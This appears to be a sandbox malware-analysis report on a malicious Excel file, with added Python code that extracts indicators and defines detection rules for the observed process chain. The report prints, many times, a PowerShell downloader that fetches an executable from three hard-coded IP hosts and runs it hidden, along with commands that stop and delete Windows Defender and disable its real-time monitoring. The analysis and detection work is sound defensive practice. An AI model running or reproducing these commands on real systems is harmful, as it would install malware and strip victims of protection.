Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''%tmp%\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''%tmp%\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath %tmp%\tmp6014.bat; start-process '%tmp%\tmp6014.bat' -windowstyle hidden'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' '
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe '<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe');}catch{$beos1=0;}return $beos1;}$mmb1=@('198.46.190.41/knot1.php','198.12.71.3/knot2.php','107.172.129.213/knot3.php');foreach ($bifa in $mmb1){if(split-strings('http://'+$bifa) -eq 1){break;} };<#validate component#>start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe' -windowstyle hidden;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\tmp0251.exe 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exe Process created: C:\Windows\System32\cmd.exe /c sc stop WinDefend
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exe Process created: C:\Windows\System32\cmd.exe /c sc delete WinDefend
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exe Process created: C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exe Process created: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop WinDefend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete WinDefend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe 'C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe'
Uses an in-process (OLE) Automation server
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32
Writes ini files
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe File written: C:\Users\user\AppData\Roaming\WinSocket\settings.ini
Executable creates window controls seldom found in malware
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Window found: window name: SysTabControl32
Found graphical window changes (likely an installer)
Source: Window Recorder Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: C:\Windows\System.Management.Automation.pdb% source: powershell.exe, 00000011.00000002.2090250678.01826000.00000004.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2090250678.01826000.00000004.sdmp
Source: Binary string: System.Management.Automation.pdbAA:E source: powershell.exe, 00000011.00000002.2092848250.04DED000.00000004.sdmp
Source: Binary string: System.Management.Automation.pdbh source: powershell.exe, 00000011.00000002.2092848250.04DED000.00000004.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2090250678.01826000.00000004.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2090250678.01826000.00000004.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.2038600593.01B00000.00000002.sdmp, powershell.exe, 00000007.00000002.2085203122.03F10000.00000002.sdmp, powershell.exe, 00000011.00000002.2092552923.03EC0000.00000002.sdmp
Source: Binary string: indows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000011.00000002.2090250678.01826000.00000004.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2090250678.01826000.00000004.sdmp

Data Obfuscation:

Powershell starts a process from the temp directory
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe '<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe');}catch{$beos1=0;}return $beos1;}$mmb1=@('198.46.190.41/knot1.php','198.12.71.3/knot2.php','107.172.129.213/knot3.php');foreach ($bifa in $mmb1){if(split-strings('http://'+$bifa) -eq 1){break;} };<#validate component#>start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe' -windowstyle hidden;
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe '<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe');}catch{$beos1=0;}return $beos1;}$mmb1=@('198.46.190.41/knot1.php','198.12.71.3/knot2.php','107.172.129.213/knot3.php');foreach ($bifa in $mmb1){if(split-strings('http://'+$bifa) -eq 1){break;} };<#validate component#>start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe' -windowstyle hidden;
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe '<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe');}catch{$beos1=0;}return $beos1;}$mmb1=@('198.46.190.41/knot1.php','198.12.71.3/knot2.php','107.172.129.213/knot3.php');foreach ($bifa in $mmb1){if(split-strings('http://'+$bifa) -eq 1){break;} };<#validate component#>start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe' -windowstyle hidden;
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe '<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe');}catch{$beos1=0;}return $beos1;}$mmb1=@('198.46.190.41/knot1.php','198.12.71.3/knot2.php','107.172.129.213/knot3.php');foreach ($bifa in $mmb1){if(split-strings('http://'+$bifa) -eq 1){break;} };<#validate component#>start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe' -windowstyle hidden;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe Code function: 18_2_004BA298 LoadLibraryW,GetProcAddress,18_2_004BA298
PE file contains sections with non-standard names
Source: tmp0251.exe.7.dr Static PE information: section name: .eh_fram
Source: tmp0261.exe.8.dr Static PE information: section name: .eh_fram
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exe Code function: 8_2_002C2707 push 5A20CEDFh; retf 8_2_002C270C
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exe Code function: 8_2_002C1176 push ebp; retf 8_2_002C1188
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exe Code function: 8_2_002C1C51 push dword ptr [edi+67h]; retf 8_2_002C1C65
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exe Code function: 8_2_002C29AE push 5A20CEBEh; retf 8_2_002C29D2
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe Code function: 18_2_0046275E push es; ret 18_2_0046275F
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe Code function: 18_2_003E643E push es; ret 18_2_003E643F
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe Code function: 18_2_003C1176 push ebp; retf 18_2_003C1188
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe Code function: 18_2_003C1C51 push dword ptr [edi+67h]; retf 18_2_003C1C65
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe Code function: 20_2_0046275E push es; ret 20_2_0046275F
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe Code function: 20_2_004F1C51 push dword ptr [edi+67h]; retf 20_2_004F1C65
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe Code function: 20_2_004F1176 push ebp; retf 20_2_004F1188
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe Code function: 20_2_0051643E push es; ret 20_2_0051643F

Persistence and Installation Behavior:

Tries to download and execute files (via powershell)Show sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe '<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe');}catch{$beos1=0;}return $beos1;}$mmb1=@('198.46.190.41/knot1.php','198.12.71.3/knot2.php','107.172.129.213/knot3.php');foreach ($bifa in $mmb1){if(split-strings('http://'+$bifa) -eq 1){break;} };<#validate component#>start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe' -windowstyle hidden;
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe '<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe');}catch{$beos1=0;}return $beos1;}$mmb1=@('198.46.190.41/knot1.php','198.12.71.3/knot2.php','107.172.129.213/knot3.php');foreach ($bifa in $mmb1){if(split-strings('http://'+$bifa) -eq 1){break;} };<#validate component#>start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe' -windowstyle hidden;
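The four process-creation entries above are one script recorded at two depths of the launch chain. The nested form (every quote doubled) is the outer powershell.exe, which writes the inner one-liner into Temp\tmp6014.bat as a single-quoted string and starts the batch file with a hidden window; the plain form is the inner powershell.exe that the batch file starts. That inner script defines a function wrapping System.Net.WebClient.DownloadFile with the destination fixed to Temp\tmp0251.exe, walks three hard-coded IP-addressed hosts and stops at the first download that does not throw, then launches the file hidden. The `<# ... #>` fragments are inert PowerShell block comments placed inside the script to break naive string matching. The Python below is an added example and not part of the report: it normalizes the recorded command line (one level of quote un-escaping, comments removed) and extracts the indicators an analyst would pivot on. The embedded command line is the report's own, copied verbatim; the regular expressions are written for the layout of this script and are an assumption about the family, not a general PowerShell parser.

```python
import re

# The innermost powershell.exe command line from the process-creation entries
# above, copied verbatim from the report (not constructed). The outer launch
# embeds this same text as a single-quoted PowerShell string, which is why
# every ' appears doubled as '' in the nested entries.
CMDLINE = r"""powershell.exe '<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe');}catch{$beos1=0;}return $beos1;}$mmb1=@('198.46.190.41/knot1.php','198.12.71.3/knot2.php','107.172.129.213/knot3.php');foreach ($bifa in $mmb1){if(split-strings('http://'+$bifa) -eq 1){break;} };<#validate component#>start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe' -windowstyle hidden;"""

# Patterns written for the shape of this script (assumption: the family keeps
# this layout; they are not a general PowerShell parser).
BLOCK_COMMENT = re.compile(r"<#.*?#>", re.S)                  # inert <# ... #> comments
ARRAY_LITERAL = re.compile(r"@\(([^)]*)\)")                   # @('a','b',...) host list
SINGLE_QUOTED = re.compile(r"'([^']*)'")
DOWNLOAD_TARGET = re.compile(r"\.downloadfile\(\s*\$\w+\s*,\s*'([^']+)'\s*\)", re.I)
URL_PREFIX = re.compile(r"'(https?://)'\s*\+\s*\$\w+", re.I)  # scheme prepended in the loop
START_PROCESS = re.compile(r"start-process\s+'([^']+)'([^;]*)", re.I)
HIDDEN_WINDOW = re.compile(r"-windowstyle\s+hidden", re.I)
FALLBACK_LOOP = re.compile(r"foreach\s*\([^)]*\)\s*\{.*?\bbreak\b", re.I | re.S)


def normalize(cmdline: str) -> str:
    """Undo one level of PowerShell single-quote escaping ('' -> ') and strip
    the block comments, leaving the script as the inner interpreter saw it."""
    return BLOCK_COMMENT.sub("", cmdline.replace("''", "'"))


def extract_iocs(cmdline: str) -> dict:
    """Return the indicators an analyst pivots on: the download URLs in the
    order the loop tries them, the DownloadFile() destination, the path handed
    to Start-Process, and the obfuscation/behaviour markers seen in the text."""
    script = normalize(cmdline)
    array = ARRAY_LITERAL.search(script)
    hosts = SINGLE_QUOTED.findall(array.group(1)) if array else []
    prefix = URL_PREFIX.search(script)
    scheme = prefix.group(1) if prefix else ""
    download = DOWNLOAD_TARGET.search(script)
    launch = START_PROCESS.search(script)
    return {
        "comment_count": len(BLOCK_COMMENT.findall(cmdline)),
        "urls": [scheme + h for h in hosts],
        "dropped": download.group(1) if download else None,
        "executed": launch.group(1) if launch else None,
        "hidden_window": bool(launch and HIDDEN_WINDOW.search(launch.group(2))),
        "fallback_loop": bool(FALLBACK_LOOP.search(script)),
    }


def as_nested(cmdline: str) -> str:
    """Wrap a script the way the outer launch in the report does: embed it as
    a single-quoted string argument, doubling every single quote."""
    return "powershell.exe '" + cmdline.replace("'", "''") + "'"


if __name__ == "__main__":
    for key, value in extract_iocs(CMDLINE).items():
        print(f"{key}: {value}")
```

Running the script prints the three URLs, the drop path and the launch path. Feeding it the nested form instead (as_nested reproduces the quoting of the cmd.exe launch entry) yields the same result after one level of un-escaping, which is the quick way to confirm that the two recorded forms are the same script and not a second stage.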
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exe | File created: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\tmp0251.exe
Read these in reverse order: the PowerShell downloader writes tmp0251.exe to Temp first, and that executable then places tmp0261.exe under the roaming profile in a WinSocket directory, which is the process the evasion signatures further down refer to.

Boot Survival:

Uses sc.exe to modify the status of services
Source: unknown | Process created: C:\Windows\System32\sc.exe sc stop WinDefend
Stopping WinDefend requires the SERVICE_STOP right on the service, which standard users do not hold by default; whether this call succeeded therefore depends on the privileges of the account running the chain, and the report records the parent of this sc.exe launch as unknown.
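The process-creation entries above supply the parent/child pairs and command lines a detection engineer would encode for this chain: cmd.exe and powershell.exe launching powershell.exe, a WebClient download and a .bat staged under Temp inside the command line, block-comment obfuscation, a hidden window, sc.exe stopping WinDefend, and executables running from Temp and the roaming profile. The Python below is an added example and not part of the report: it runs a small rule set over process-creation records of the shape shown here and reports which rules fired. The event list is constructed for the example (image paths and command-line fragments are the report's; the long one-liners are cut down to the parts the rules inspect, marked with "..."), and the rule names are the example's own, not Joe Sandbox signatures.

```python
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple


@dataclass
class ProcEvent:
    """One 'Process created' record as the report presents it: the image
    launched, its command line and the launching (source) image. parent is
    None where the report records the source as unknown."""
    image: str
    cmdline: str
    parent: Optional[str] = None


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SC = r"C:\Windows\System32\sc.exe"
DROPPER = r"C:\Users\user\AppData\Local\Temp\tmp0251.exe"
PAYLOAD = r"C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe"

# Constructed sample events for this example. Image paths, parents and the
# command-line fragments come from the report; the long one-liners are cut
# down to the parts the rules key on ("..."). The launch parent of
# tmp0261.exe is left None because this section shows only its file drop.
EVENTS: List[ProcEvent] = [
    # outer launch: writes the downloader to a .bat under Temp, starts it hidden
    ProcEvent(PS, r"powershell.exe ''powershell.exe ''<#11#> function split-strings ... (new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'') ... start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'", CMD),
    # inner launch from the batch file: the downloader itself
    ProcEvent(PS, r"powershell.exe '<#11#> function split-strings ... (new-object system.net.webclient <#replace ext#> ).downloadfile($string1,'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe') ... start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe' -windowstyle hidden;", CMD),
    ProcEvent(SC, "sc stop WinDefend", None),
    ProcEvent(DROPPER, "tmp0251.exe", PS),
    ProcEvent(PAYLOAD, "tmp0261.exe", None),
]


def _image_is(path: Optional[str], name: str) -> bool:
    """True when the path's file name is `name` (case-insensitive)."""
    return path is not None and path.lower().endswith("\\" + name)


def _has(pattern: str, text: str) -> bool:
    return re.search(pattern, text, re.I | re.S) is not None


RULES: Dict[str, Callable[[ProcEvent], bool]] = {
    # PowerShell fetching a file with WebClient.DownloadFile
    "ps_webclient_download": lambda e: _image_is(e.image, "powershell.exe")
        and _has(r"new-object\s+system\.net\.webclient.*?\.downloadfile\(", e.cmdline),
    # <# ... #> block comments inside a one-liner exist only to break string matching
    "ps_block_comment_obfuscation": lambda e: _image_is(e.image, "powershell.exe")
        and _has(r"<#.*?#>", e.cmdline),
    "ps_hidden_window": lambda e: _image_is(e.image, "powershell.exe")
        and _has(r"-windowstyle\s+hidden", e.cmdline),
    # script text written to a .bat under Temp, from which the next stage is started
    "ps_stages_bat_in_temp": lambda e: _image_is(e.image, "powershell.exe")
        and _has(r"out-file\b.*?\\Temp\\[^\s;']+\.bat", e.cmdline),
    "sc_stops_defender": lambda e: _image_is(e.image, "sc.exe")
        and _has(r"\bstop\s+windefend\b", e.cmdline),
    # binaries run from Temp or the roaming profile, where this chain drops its stages
    "exec_from_user_writable_dir": lambda e: _has(r"\\AppData\\(Local\\Temp|Roaming)\\", e.image),
    "shell_spawns_powershell": lambda e: _image_is(e.image, "powershell.exe")
        and (_image_is(e.parent, "cmd.exe") or _image_is(e.parent, "powershell.exe")),
}


def evaluate(events: List[ProcEvent]) -> List[Tuple[str, str]]:
    """Run every rule over every event; return (rule, image) pairs in event order."""
    return [(name, e.image) for e in events for name, rule in RULES.items() if rule(e)]


def triggered(events: List[ProcEvent]) -> List[str]:
    """Distinct rule names that fired, sorted, for a one-line verdict."""
    return sorted({name for name, _ in evaluate(events)})


if __name__ == "__main__":
    for name, image in evaluate(EVENTS):
        print(f"{name:32} {image}")
    print("triggered:", ", ".join(triggered(EVENTS)))
```

The rules are deliberately independent so that each one can be scored on its own: sc_stops_defender and ps_stages_bat_in_temp are strong on their own, while ps_hidden_window or exec_from_user_writable_dir are common in legitimate software and only carry weight in combination with the others.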

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (53 identical entries)
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (57 identical entries)
